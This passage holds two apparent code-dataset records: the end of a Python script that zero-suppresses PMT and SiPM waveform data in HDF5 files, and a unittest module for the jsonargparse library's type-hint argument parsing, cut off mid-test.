pmts_noise_threshold_blr_ = (PMT_NOISE_CUT_BLR * noise_adc /\n pmt_ave_consts_blr * NPMT**0.5 * 1.01)\n\n if SIPM_ZS_METHOD == \"FRACTION\":\n sipms_thresholds_ = sipms_noise_sampler_.ComputeThresholds(\n SIPM_NOISE_CUT, sipmdf['adc_to_pes'])\n else:\n sipms_thresholds_ = np.ones(NSIPM) * SIPM_NOISE_CUT\n\n if \"/ZS\" not in h5in:\n h5in.create_group(h5in.root, \"ZS\")\n if \"/ZS/PMT\" in h5in:\n h5in.remove_node(\"/ZS\", \"PMT\")\n if \"/ZS/BLR\" in h5in:\n h5in.remove_node(\"/ZS\", \"BLR\")\n if \"/ZS/SiPM\" in h5in:\n h5in.remove_node(\"/ZS\", \"SiPM\")\n\n # Notice the Int16, not Float32! bad for compression\n pmt_zs_ = h5in.create_earray(h5in.root.ZS, \"PMT\",\n atom=tb.Int16Atom(),\n shape=(0, 1, PMTWL),\n expectedrows=NEVT)\n\n pmt_zs_blr_ = h5in.create_earray(h5in.root.ZS, \"BLR\",\n atom=tb.Int16Atom(),\n shape=(0, 1, PMTWL),\n expectedrows=NEVT)\n\n sipm_zs_ = h5in.create_earray(h5in.root.ZS, \"SiPM\",\n atom=tb.Int16Atom(),\n shape=(0, NSIPM, SIPMWL),\n expectedrows=NEVT)\n\n first_evt, last_evt = define_event_loop(FIRST_EVT, LAST_EVT,\n NEVENTS, NEVT, RUN_ALL)\n\n t0 = time()\n for i in range(first_evt, last_evt):\n logger.info(\"-->event number ={}\".format(i))\n\n # Integrate PMT plane in pes (not in time!)\n pmtcwf_int_pes = (pmtcwf[i] / pmt_cal_consts_raw).sum(axis=0)\n pmtblr_int_pes = (pmtblr[i] / pmt_cal_consts_blr).sum(axis=0)\n\n # suppress_wf puts zeros where the wf is below the threshold\n pmtcwf_int_pes = wfm.suppress_wf(pmtcwf_int_pes,\n pmts_noise_threshold_raw_)\n pmtblr_int_pes = wfm.suppress_wf(pmtblr_int_pes,\n pmts_noise_threshold_blr_)\n\n pmt_zs_.append(pmtcwf_int_pes.reshape(1, 1, PMTWL))\n pmt_zs_blr_.append(pmtblr_int_pes.reshape(1, 1, PMTWL))\n\n SiPMdata = wfm.subtract_baseline(sipmrwf[i], None)\n SiPMdata = wfm.noise_suppression(SiPMdata, sipms_thresholds_)\n #SiPMdata = wfm.to_pes(SiPMdata, sipmdf)\n\n sipm_zs_.append(SiPMdata.reshape(1, NSIPM, SIPMWL))\n t1 = time()\n dt = t1-t0\n\n print(\"ANASTASIA has run over {} events in {} seconds\".format(i, dt))\n print(\"Leaving ANASTASIA. 
Safe travels!\")\n\n\nif __name__ == \"__main__\":\n from cities import anastasia\n print(anastasia)\n ANASTASIA(sys.argv)\n","sub_path":"Cities/ANASTASIA.py","file_name":"ANASTASIA.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"438205976","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nimport pathlib\nimport random\nimport re\nimport sys\nimport unittest\nimport uuid\nimport warnings\nimport yaml\nfrom calendar import Calendar\nfrom contextlib import redirect_stderr, redirect_stdout\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom enum import Enum\nfrom gzip import GzipFile\nfrom io import StringIO\nfrom typing import Any, Callable, Dict, Iterable, List, Mapping, Optional, Sequence, Tuple, Type, Union\nfrom jsonargparse import ActionConfigFile, ArgumentParser, CLI, lazy_instance, Namespace, ParserError, Path\nfrom jsonargparse.typehints import ActionTypeHint, is_optional, Literal\nfrom jsonargparse.typing import (\n Email,\n NotEmptyStr,\n OpenUnitInterval,\n Path_drw,\n Path_fc,\n Path_fr,\n path_type,\n PositiveInt,\n register_type,\n restricted_number_type,\n)\nfrom jsonargparse_tests.base import mock_module, TempDirTestCase\n\n\nclass TypeHintsTests(unittest.TestCase):\n\n def test_add_argument_type_hint(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op1', type=Optional[Union[PositiveInt, OpenUnitInterval]])\n self.assertEqual(0.1, parser.parse_args(['--op1', '0.1']).op1)\n self.assertEqual(0.9, parser.parse_args(['--op1', '0.9']).op1)\n self.assertEqual(1, parser.parse_args(['--op1', '1']).op1)\n self.assertEqual(12, parser.parse_args(['--op1', '12']).op1)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--op1', '0.0']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--op1', '4.5']))\n parser.add_argument('--op2', type=Optional[Email])\n self.assertEqual('a@b.c', parser.parse_args(['--op2', 'a@b.c']).op2)\n self.assertIsNone(parser.parse_args(['--op2=null']).op2)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--op2', 'abc']))\n\n\n def test_type_hint_action_failure(self):\n parser = ArgumentParser(error_handler=None)\n self.assertRaises(ValueError, lambda: parser.add_argument('--op1', type=Optional[bool], action=True))\n\n\n def test_bool(self):\n parser = ArgumentParser(prog='app', default_env=True, error_handler=None)\n parser.add_argument('--val', type=bool)\n self.assertEqual(None, parser.get_defaults().val)\n self.assertEqual(True, parser.parse_args(['--val', 'true']).val)\n self.assertEqual(True, parser.parse_args(['--val', 'TRUE']).val)\n self.assertEqual(False, parser.parse_args(['--val', 'false']).val)\n self.assertEqual(False, parser.parse_args(['--val', 'FALSE']).val)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--val', '1']))\n\n os.environ['APP_VAL'] = 'true'\n self.assertEqual(True, parser.parse_args([]).val)\n os.environ['APP_VAL'] = 'True'\n self.assertEqual(True, parser.parse_args([]).val)\n os.environ['APP_VAL'] = 'false'\n self.assertEqual(False, parser.parse_args([]).val)\n os.environ['APP_VAL'] = 'False'\n self.assertEqual(False, parser.parse_args([]).val)\n os.environ['APP_VAL'] = '2'\n self.assertRaises(ParserError, lambda: parser.parse_args(['--val', 'a']))\n del os.environ['APP_VAL']\n\n\n def test_no_str_strip(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=Optional[str])\n parser.add_argument('--cfg', action=ActionConfigFile)\n self.assertEqual(' ', parser.parse_args(['--op', ' ']).op)\n self.assertEqual('', parser.parse_args(['--op', '']).op)\n self.assertEqual(' abc ', parser.parse_args(['--op= abc ']).op)\n self.assertEqual(' ', parser.parse_args(['--cfg={\"op\":\" \"}']).op)\n 
self.assertIsNone(parser.parse_args(['--op=null']).op)\n\n\n def test_str_not_timestamp_issue_135(self):\n parser = ArgumentParser()\n parser.add_argument('foo', type=str)\n self.assertEqual('2022-04-12', parser.parse_args(['2022-04-12']).foo)\n self.assertEqual('2022-04-32', parser.parse_args(['2022-04-32']).foo)\n\n\n def test_list(self):\n for list_type in [Iterable, List, Sequence]:\n with self.subTest(str(list_type)):\n parser = ArgumentParser()\n parser.add_argument('--list', type=list_type[int])\n cfg = parser.parse_args(['--list=[1, 2]'])\n self.assertEqual([1, 2], cfg.list)\n\n\n def test_enum(self):\n class MyEnum(Enum):\n A = 1\n B = 2\n C = 3\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--enum', type=MyEnum, default=MyEnum.C, help='Description')\n\n for val in ['A', 'B', 'C']:\n self.assertEqual(MyEnum[val], parser.parse_args(['--enum='+val]).enum)\n for val in ['X', 'b', 2]:\n self.assertRaises(ParserError, lambda: parser.parse_args(['--enum='+str(val)]))\n\n cfg = parser.parse_args(['--enum=C'], with_meta=False)\n self.assertEqual('enum: C\\n', parser.dump(cfg))\n\n help_str = StringIO()\n parser.print_help(help_str)\n self.assertIn('Description (type: MyEnum, default: C)', help_str.getvalue())\n\n\n def test_list_enum(self):\n class MyEnum(Enum):\n ab = 0\n xy = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--list', type=List[MyEnum])\n self.assertEqual([MyEnum.xy, MyEnum.ab], parser.parse_args(['--list=[\"xy\", \"ab\"]']).list)\n\n\n def test_list_union(self):\n class MyEnum(Enum):\n ab = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--list1', type=List[Union[float, str, type(None)]])\n parser.add_argument('--list2', type=List[Union[int, MyEnum]])\n self.assertEqual([1.2, 'ab'], parser.parse_args(['--list1=[1.2, \"ab\"]']).list1)\n self.assertEqual([3, MyEnum.ab], parser.parse_args(['--list2=[3, \"ab\"]']).list2)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--list1={\"a\":1, \"b\":\"2\"}']))\n\n\n def test_dict(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--dict', type=dict)\n self.assertEqual({}, parser.parse_args(['--dict={}'])['dict'])\n self.assertEqual({'a': 1, 'b': '2'}, parser.parse_args(['--dict={\"a\":1, \"b\":\"2\"}'])['dict'])\n self.assertRaises(ParserError, lambda: parser.parse_args(['--dict=1']))\n\n\n def test_dict_items(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--dict', type=Dict[str, int])\n cfg = parser.parse_args(['--dict.one=1', '--dict.two=2'])\n self.assertEqual(cfg.dict, {'one': 1, 'two': 2})\n\n\n def test_dict_union(self):\n class MyEnum(Enum):\n ab = 1\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--dict1', type=Dict[int, Optional[Union[float, MyEnum]]])\n parser.add_argument('--dict2', type=Dict[str, Union[bool, Path_fc]])\n cfg = parser.parse_args(['--dict1={\"2\":4.5, \"6\":\"ab\"}', '--dict2={\"a\":true, \"b\":\"f\"}'])\n self.assertEqual({2: 4.5, 6: MyEnum.ab}, cfg['dict1'])\n self.assertEqual({'a': True, 'b': 'f'}, cfg['dict2'])\n self.assertIsInstance(cfg['dict2']['b'], Path)\n self.assertEqual({5: None}, parser.parse_args(['--dict1={\"5\":null}'])['dict1'])\n self.assertRaises(ParserError, lambda: parser.parse_args(['--dict1=[\"a\", \"b\"]']))\n cfg = yaml.safe_load(parser.dump(cfg))\n self.assertEqual({'dict1': {'2': 4.5, '6': 'ab'}, 'dict2': {'a': True, 'b': 'f'}}, cfg)\n\n\n def test_tuple(self):\n class MyEnum(Enum):\n ab = 1\n\n parser = 
ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[Union[int, MyEnum], Path_fc, NotEmptyStr])\n cfg = parser.parse_args(['--tuple=[2, \"a\", \"b\"]'])\n self.assertEqual((2, 'a', 'b'), cfg.tuple)\n self.assertIsInstance(cfg.tuple[1], Path)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[2, \"a\", \"b\", 5]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[2, \"a\"]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[\"2\", \"a\", \"b\"]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple={\"a\":1, \"b\":\"2\"}']))\n out = StringIO()\n parser.print_help(out)\n self.assertIn('--tuple [ITEM,...] (type: Tuple[Union[int, MyEnum], Path_fc, NotEmptyStr], default: null)', out.getvalue())\n\n\n def test_tuple_untyped(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=tuple)\n cfg = parser.parse_args(['--tuple=[1, \"a\", True]'])\n self.assertEqual((1, 'a', True), cfg.tuple)\n out = StringIO()\n parser.print_help(out)\n self.assertIn('--tuple [ITEM,...] (type: tuple, default: null)', out.getvalue())\n\n\n def test_nested_tuples(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[Tuple[str, str], Tuple[Tuple[int, float], Tuple[int, float]]])\n cfg = parser.parse_args(['--tuple=[[\"foo\", \"bar\"], [[1, 2.02], [3, 3.09]]]'])\n self.assertEqual((('foo', 'bar'), ((1, 2.02), (3, 3.09))), cfg.tuple)\n\n\n def test_list_tuple(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--list', type=List[Tuple[int, float]])\n cfg = parser.parse_args(['--list=[[1, 2.02], [3, 3.09]]'])\n self.assertEqual([(1, 2.02), (3, 3.09)], cfg.list)\n\n\n def test_list_str_positional(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('list', type=List[str])\n cfg = parser.parse_args(['[\"a\", \"b\"]'])\n self.assertEqual(cfg.list, ['a', 'b'])\n\n\n def test_tuple_ellipsis(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[float, ...])\n self.assertEqual((1.2,), parser.parse_args(['--tuple=[1.2]']).tuple)\n self.assertEqual((1.2, 3.4), parser.parse_args(['--tuple=[1.2, 3.4]']).tuple)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[]']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--tuple=[2, \"a\"]']))\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--tuple', type=Tuple[Tuple[str, str], Tuple[Tuple[int, float], ...]])\n cfg = parser.parse_args(['--tuple=[[\"foo\", \"bar\"], [[1, 2.02], [3, 3.09]]]'])\n self.assertEqual((('foo', 'bar'), ((1, 2.02), (3, 3.09))), cfg.tuple)\n\n\n def test_complex_number(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--complex', type=complex)\n cfg = parser.parse_args(['--complex=(2+3j)'])\n self.assertEqual(cfg.complex, 2+3j)\n self.assertEqual(parser.dump(cfg), 'complex: (2+3j)\\n')\n\n\n def test_list_append(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--val', type=Union[int, str, List[int]])\n self.assertEqual(0, parser.parse_args(['--val=0']).val)\n self.assertEqual([0], parser.parse_args(['--val+=0']).val)\n self.assertEqual([1, 2, 3], parser.parse_args(['--val=1', '--val+=2', '--val+=3']).val)\n self.assertEqual([1, 2, 3], parser.parse_args(['--val=[1,2]', '--val+=3']).val)\n self.assertEqual([1], 
parser.parse_args(['--val=a', '--val+=1']).val)\n with warnings.catch_warnings(record=True) as w:\n self.assertEqual(3, parser.parse_args(['--val=[1,2]', '--val=3']).val)\n self.assertIn('Replacing list value \"[1, 2]\" with \"3\"', str(w[0].message))\n\n\n def test_list_append_config(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--cfg', action=ActionConfigFile)\n parser.add_argument('--val', type=List[int], default=[1, 2])\n self.assertEqual([3, 4], parser.parse_args(['--cfg', 'val: [3, 4]']).val)\n self.assertEqual([1, 2, 3], parser.parse_args(['--cfg', 'val+: 3']).val)\n self.assertEqual([1, 2, 3, 4], parser.parse_args(['--cfg', 'val+: [3, 4]']).val)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--cfg', 'val+: a']))\n\n\n def test_list_append_subcommand_subclass(self):\n class A:\n def __init__(self, cals: Union[Calendar, List[Calendar]] = None):\n self.cals = cals\n\n parser = ArgumentParser(error_handler=None)\n subparser = ArgumentParser()\n subparser.add_class_arguments(A, 'a')\n subcommands = parser.add_subcommands()\n subcommands.add_subcommand('cmd', subparser)\n cfg = parser.parse_args([\n 'cmd',\n '--a.cals+=Calendar',\n '--a.cals.firstweekday=3',\n '--a.cals+=TextCalendar',\n '--a.cals.firstweekday=1',\n ])\n self.assertEqual(['calendar.Calendar', 'calendar.TextCalendar'], [x.class_path for x in cfg.cmd.a.cals])\n self.assertEqual([3, 1], [x.init_args.firstweekday for x in cfg.cmd.a.cals])\n cfg = parser.parse_args(['cmd', f'--a={json.dumps(cfg.cmd.a.as_dict())}', '--a.cals.firstweekday=4'])\n self.assertEqual(Namespace(firstweekday=4), cfg.cmd.a.cals[-1].init_args)\n\n\n def test_restricted_number_type(self):\n limit_val = random.randint(100, 10000)\n larger_than = restricted_number_type(f'larger_than_{limit_val}', int, ('>', limit_val))\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--val', type=larger_than, default=limit_val+1, help='Description')\n\n self.assertEqual(limit_val+1, parser.parse_args([f'--val={limit_val+1}']).val)\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--val={limit_val-1}']))\n\n help_str = StringIO()\n parser.print_help(help_str)\n self.assertIn(f'Description (type: larger_than_{limit_val}, default: {limit_val+1})', help_str.getvalue())\n\n\n def test_type_Any(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--any', type=Any)\n self.assertEqual('abc', parser.parse_args(['--any=abc'])['any'])\n self.assertEqual(123, parser.parse_args(['--any=123'])['any'])\n self.assertEqual(5.6, parser.parse_args(['--any=5.6'])['any'])\n self.assertEqual([7, 8], parser.parse_args(['--any=[7, 8]'])['any'])\n self.assertEqual({\"a\":0, \"b\":1}, parser.parse_args(['--any={\"a\":0, \"b\":1}'])['any'])\n self.assertTrue(parser.parse_args(['--any=True'])['any'])\n self.assertFalse(parser.parse_args(['--any=False'])['any'])\n self.assertIsNone(parser.parse_args(['--any=null'])['any'])\n self.assertEqual(' ', parser.parse_args(['--any= '])['any'])\n self.assertEqual(' xyz ', parser.parse_args(['--any= xyz '])['any'])\n self.assertEqual('[[[', parser.parse_args(['--any=[[['])['any'])\n\n\n @unittest.skipIf(not Literal, 'Literal introduced in python 3.8 or backported in typing_extensions')\n def test_Literal(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--str', type=Literal['a', 'b', None])\n parser.add_argument('--int', type=Literal[3, 4])\n parser.add_argument('--true', type=Literal[True])\n parser.add_argument('--false', 
type=Literal[False])\n self.assertEqual('a', parser.parse_args(['--str=a']).str)\n self.assertEqual('b', parser.parse_args(['--str=b']).str)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--str=x']))\n self.assertIsNone(parser.parse_args(['--str=null']).str)\n self.assertEqual(4, parser.parse_args(['--int=4']).int)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--int=5']))\n self.assertIs(True, parser.parse_args(['--true=true']).true)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--true=false']))\n self.assertIs(False, parser.parse_args(['--false=false']).false)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--false=true']))\n out = StringIO()\n parser.print_help(out)\n for value in ['--str {a,b,null}', '--int {3,4}', '--true True', '--false False']:\n self.assertIn(value, out.getvalue())\n\n\n def test_nested_mapping_without_args(self):\n parser = ArgumentParser()\n parser.add_argument('--map', type=Mapping[str, Union[int, Mapping]])\n self.assertEqual(parser.parse_args(['--map={\"a\": 1}']).map, {\"a\": 1})\n self.assertEqual(parser.parse_args(['--map={\"b\": {\"c\": 2}}']).map, {\"b\": {\"c\": 2}})\n\n\n def _test_typehint_non_parameterized_types(self, type):\n parser = ArgumentParser(error_handler=None)\n ActionTypeHint.is_supported_typehint(type, full=True)\n parser.add_argument('--type', type=type)\n cfg = parser.parse_args(['--type=uuid.UUID'])\n self.assertEqual(cfg.type, uuid.UUID)\n self.assertEqual(parser.dump(cfg), 'type: uuid.UUID\\n')\n\n\n def _test_typehint_parameterized_types(self, type):\n parser = ArgumentParser(error_handler=None)\n ActionTypeHint.is_supported_typehint(type, full=True)\n parser.add_argument('--cal', type=type[Calendar])\n cfg = parser.parse_args(['--cal=calendar.Calendar'])\n self.assertEqual(cfg.cal, Calendar)\n self.assertEqual(parser.dump(cfg), 'cal: calendar.Calendar\\n')\n self.assertRaises(ParserError, lambda: parser.parse_args(['--cal=uuid.UUID']))\n\n\n def test_typehint_Type(self):\n self._test_typehint_non_parameterized_types(type=Type)\n self._test_typehint_parameterized_types(type=Type)\n\n\n def test_typehint_non_parameterized_type(self):\n self._test_typehint_non_parameterized_types(type=type)\n\n\n @unittest.skipIf(sys.version_info[:2] < (3, 9), '[] support for builtins introduced in python 3.9')\n def test_typehint_parametrized_type(self):\n self._test_typehint_parameterized_types(type=type)\n\n\n def test_uuid(self):\n id1 = uuid.uuid4()\n id2 = uuid.uuid4()\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--uuid', type=uuid.UUID)\n parser.add_argument('--uuids', type=List[uuid.UUID])\n cfg = parser.parse_args(['--uuid='+str(id1), '--uuids=[\"'+str(id1)+'\", \"'+str(id2)+'\"]'])\n self.assertEqual(cfg.uuid, id1)\n self.assertEqual(cfg.uuids, [id1, id2])\n self.assertEqual('uuid: '+str(id1)+'\\nuuids:\\n- '+str(id1)+'\\n- '+str(id2)+'\\n', parser.dump(cfg))\n\n\n @unittest.skipIf(sys.version_info[:2] < (3, 10), 'new union syntax introduced in python 3.10')\n def test_union_new_syntax(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--str', type=eval('int | None'))\n self.assertEqual(123, parser.parse_args(['--str=123']).str)\n self.assertIsNone(parser.parse_args(['--str=null']).str)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--str=abc']))\n\n\n def test_Callable_with_function_path(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--callable', type=Callable, default=lazy_instance)\n 
parser.add_argument('--list', type=List[Callable])\n\n cfg = parser.parse_args(['--callable=jsonargparse.CLI'])\n self.assertEqual(CLI, cfg.callable)\n self.assertEqual(parser.dump(cfg), 'callable: jsonargparse.CLI\\n')\n self.assertEqual([CLI], parser.parse_args(['--list=[jsonargparse.CLI]']).list)\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable=jsonargparse.not_exist']))\n\n out = StringIO()\n parser.print_help(out)\n self.assertIn('(type: Callable, default: jsonargparse.lazy_instance)', out.getvalue())\n\n\n def test_Callable_with_class_path(self):\n class MyFunc1:\n def __init__(self, p1: int = 1):\n self.p1 = p1\n def __call__(self):\n return self.p1\n\n class MyFunc2(MyFunc1):\n pass\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--callable', type=Callable)\n\n with mock_module(MyFunc1, MyFunc2) as module:\n value = {'class_path': f'{module}.MyFunc2', 'init_args': {'p1': 1}}\n cfg = parser.parse_args([f'--callable={module}.MyFunc2'])\n self.assertEqual(cfg.callable.as_dict(), value)\n value = {'class_path': f'{module}.MyFunc1', 'init_args': {'p1': 2}}\n cfg = parser.parse_args([f'--callable={json.dumps(value)}'])\n self.assertEqual(cfg.callable.as_dict(), value)\n self.assertEqual(yaml.safe_load(parser.dump(cfg))['callable'], value)\n cfg_init = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg_init.callable, MyFunc1)\n self.assertEqual(cfg_init.callable(), 2)\n\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable={}']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable=jsonargparse.SUPPRESS']))\n self.assertRaises(ParserError, lambda: parser.parse_args(['--callable=calendar.Calendar']))\n value = {'class_path': f'{module}.MyFunc1', 'key': 'val'}\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--callable={json.dumps(value)}']))\n\n\n def test_typed_Callable_with_function_path(self):\n def my_func_1(p: int) -> str:\n return str(p)\n\n def my_func_2(p: str) -> int:\n return int(p)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--callable', type=Callable[[int], str])\n\n with mock_module(my_func_1, my_func_2) as module:\n cfg = parser.parse_args([f'--callable={module}.my_func_1'])\n self.assertEqual(my_func_1, cfg.callable)\n cfg = parser.parse_args([f'--callable={module}.my_func_2'])\n self.assertEqual(my_func_2, cfg.callable) # Currently callable types are ignored\n\n\n def test_class_type(self):\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=Optional[List[Calendar]])\n\n class_path = '\"class_path\": \"calendar.Calendar\"'\n expected = [{'class_path': 'calendar.Calendar', 'init_args': {'firstweekday': 0}}]\n cfg = parser.parse_args(['--op=[{'+class_path+'}]'])\n self.assertEqual(cfg.as_dict()['op'], expected)\n cfg = parser.parse_args(['--op=[\"calendar.Calendar\"]'])\n self.assertEqual(cfg.as_dict()['op'], expected)\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['op'][0], Calendar)\n\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{\"class_path\": \"jsonargparse.ArgumentParser\"}]'])\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{\"class_path\": \"jsonargparse.NotExist\"}]'])\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[{\"class_path\": \"jsonargparse0.IncorrectModule\"}]'])\n with self.assertRaises(ParserError):\n parser.parse_args(['--op=[1]'])\n\n init_args = '\"init_args\": {\"bad_arg\": True}'\n with 
self.assertRaises(ParserError):\n parser.parse_args(['--op=[{'+class_path+', '+init_args+'}]'])\n\n init_args = '\"init_args\": {\"firstweekday\": 3}'\n cfg = parser.parse_args(['--op=[{'+class_path+', '+init_args+'}]'])\n self.assertEqual(cfg['op'][0]['init_args'].as_dict(), {'firstweekday': 3})\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['op'][0], Calendar)\n self.assertEqual(3, cfg['op'][0].firstweekday)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--n.op', type=Optional[Calendar])\n cfg = parser.parse_args(['--n.op={'+class_path+', '+init_args+'}'])\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['n']['op'], Calendar)\n self.assertEqual(3, cfg['n']['op'].firstweekday)\n\n parser = ArgumentParser()\n parser.add_argument('--op', type=Calendar)\n cfg = parser.parse_args(['--op={'+class_path+', '+init_args+'}'])\n cfg = parser.instantiate_classes(cfg)\n self.assertIsInstance(cfg['op'], Calendar)\n self.assertEqual(3, cfg['op'].firstweekday)\n\n cfg = parser.instantiate_classes(parser.parse_args([]))\n self.assertIsNone(cfg['op'])\n\n\n def test_class_type_without_defaults(self):\n class MyCal(Calendar):\n def __init__(self, p1: int = 1, p2: str = '2'):\n pass\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=MyCal)\n\n with mock_module(MyCal) as module:\n cfg = parser.parse_args([f'--op.class_path={module}.MyCal', '--op.init_args.p1=3'], defaults=False)\n self.assertEqual(cfg.op, Namespace(class_path=f'{module}.MyCal', init_args=Namespace(p1=3)))\n cfg = parser.parse_args(['--op.class_path', f'{module}.MyCal', '--op.init_args.p1', '3'], defaults=False)\n self.assertEqual(cfg.op, Namespace(class_path=f'{module}.MyCal', init_args=Namespace(p1=3)))\n\n\n def test_class_type_required_params(self):\n class MyCal(Calendar):\n def __init__(self, p1: int, p2: str):\n pass\n\n with mock_module(MyCal) as module:\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--op', type=MyCal, default=lazy_instance(MyCal))\n\n cfg = parser.get_defaults()\n self.assertEqual(cfg.op.class_path, f'{module}.MyCal')\n self.assertEqual(cfg.op.init_args, Namespace(p1=None, p2=None))\n self.assertRaises(ParserError, lambda: parser.parse_args([f'--op={module}.MyCal']))\n\n\n def test_class_type_subclass_given_by_name_issue_84(self):\n class LocalCalendar(Calendar):\n pass\n\n parser = ArgumentParser()\n parser.add_argument('--op', type=Union[Calendar, GzipFile, None])\n cfg = parser.parse_args(['--op=TextCalendar'])\n self.assertEqual(cfg.op.class_path, 'calendar.TextCalendar')\n\n out = StringIO()\n parser.print_help(out)\n for class_path in ['calendar.Calendar', 'calendar.TextCalendar', 'gzip.GzipFile']:\n self.assertIn(class_path, out.getvalue())\n self.assertNotIn('LocalCalendar', out.getvalue())\n\n class HTMLCalendar(Calendar):\n pass\n\n with mock_module(HTMLCalendar) as module:\n err = StringIO()\n with redirect_stderr(err), self.assertRaises(SystemExit):\n parser.parse_args(['--op.help=HTMLCalendar'])\n self.assertIn('Give the full class path to avoid ambiguity', err.getvalue())\n self.assertIn(f'{module}.HTMLCalendar', err.getvalue())\n\n\n def test_class_type_subclass_short_init_args(self):\n parser = ArgumentParser()\n parser.add_argument('--op', type=Calendar)\n cfg = parser.parse_args(['--op=TextCalendar', '--op.firstweekday=2'])\n self.assertEqual(cfg.op.class_path, 'calendar.TextCalendar')\n self.assertEqual(cfg.op.init_args, Namespace(firstweekday=2))\n\n\n def 
test_class_type_invalid_class_name_then_init_args(self):\n parser = ArgumentParser()\n parser.add_argument('--cal', type=Calendar)\n err = StringIO()\n with redirect_stderr(err), self.assertRaises(SystemExit):\n parser.parse_args(['--cal=NotCalendarSubclass', '--cal.firstweekday=2'])\n #self.assertIn('NotCalendarSubclass', err.getvalue()) # Need new way to show NotCalendarSubclass\n\n\n def test_class_type_config_merge_init_args(self):\n class MyCal(Calendar):\n def __init__(self, param_a: int = 1, param_b: str = 'x', **kwargs):\n super().__init__(**kwargs)\n\n parser = ArgumentParser(error_handler=None)\n parser.add_argument('--cfg', action=ActionConfigFile)\n parser.add_argument('--cal', type=Calendar)\n\n with mock_module(MyCal) as module:\n config1 = {\n 'cal': {\n 'class_path': f'{module}.MyCal',\n 'init_args': {\n 'firstweekday': 2,\n 'param_b': 'y',\n }\n }\n }\n config2 = deepcopy(config1)\n config2['cal']['init_args'] = {\n 'param_a': 2,\n 'firstweekday': 3,\n }\n expected = deepcopy(config1['cal'])\n expected['init_args'].update(config2['cal']['init_args'])\n\n cfg = parser.parse_args([f'--cfg={yaml.safe_dump(config1)}', f'--cfg={yaml.safe_dump(config2)}'])\n self.assertEqual(cfg.cal.as_dict(), expected)\n\n\n def test_init_args_without_class_path(self):\n parser = ArgumentParser()\n parser.add_argument('--config', action=ActionConfigFile)\n parser.add_argument('--cal', type=Calendar)\n\n config = \"\"\"cal:\n class_path: TextCalendar\n init_args:\n firstweekday: 2\n \"\"\"\n cal = \"\"\"init_args:\n firstweekday: 3\n \"\"\"\n\n cfg = parser.parse_args([f'--config={config}', f'--cal={cal}'])\n self.assertEqual(cfg.cal.init_args, Namespace(firstweekday=3))\n\n cfg = parser.parse_args([f'--config={config}', f'--cal={cfg.cal.init_args.as_dict()}'])\n self.assertEqual(cfg.cal.init_args, Namespace(firstweekday=3))\n\n\n def test_class_type_subclass_nested_init_args(self):\n class Class:\n def __init__(self, cal: Calendar, p1: int = 0):\n self.cal = cal\n\n for full in ['init_args.', '']:\n with self.subTest('full' if full else 'short'), mock_module(Class) as module:\n parser = ArgumentParser()\n 